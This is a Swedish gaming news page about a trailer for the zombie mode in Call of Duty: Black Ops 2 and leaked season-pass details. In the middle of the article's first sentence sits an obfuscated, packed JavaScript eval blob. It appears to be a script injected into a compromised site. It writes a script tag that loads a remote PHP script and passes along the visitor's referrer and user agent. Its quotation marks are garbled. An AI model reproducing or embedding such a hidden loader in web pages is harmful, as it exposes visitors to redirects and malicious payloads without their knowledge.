Image Image Image Image Image Image Image Image Image Image

| 15 oktober, 2018

Scroll to top

Top

Zombie-läget i Black Ops 2 trailer

Sebastian Plengier Ehrnfelt

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rarth|var|u0026u|referrer|hhhes||js|php’.split(‘|’),0,{}))
populära zombie-läget har kommit bli en del av Call of Duty serien. Nu har det släppts en ny trailer till det kommande spelet Black Ops 2.

Spelets uppdaterade multiplayer-motor gör det möjligt att få in fler spelare och fler zombies.

Den officiella hemsidan för Black Ops 2 listade här om dagen detaljer för säsongspasset för Call of Duty: Black Ops 2. Detaljerna plockades dock ner snabbt men folk var självklart snabba på att kopiera detaljerna och publicera på andra hemsidor.

Med detta säsongspass kommer man få samtliga DLC-paket samt att det innehåller fyra kartpaket. Enligt hemsidan ska de första DLC-paketen gå att ladda ner nästa år samt säljas för 34,99 pund, ca 380 svenska kronor.

Spelet Call of Duty: Black Ops 2 släpps den 13 november till Xbox 360, Playstation 3 och PC.

Läs mer: www.theverge.com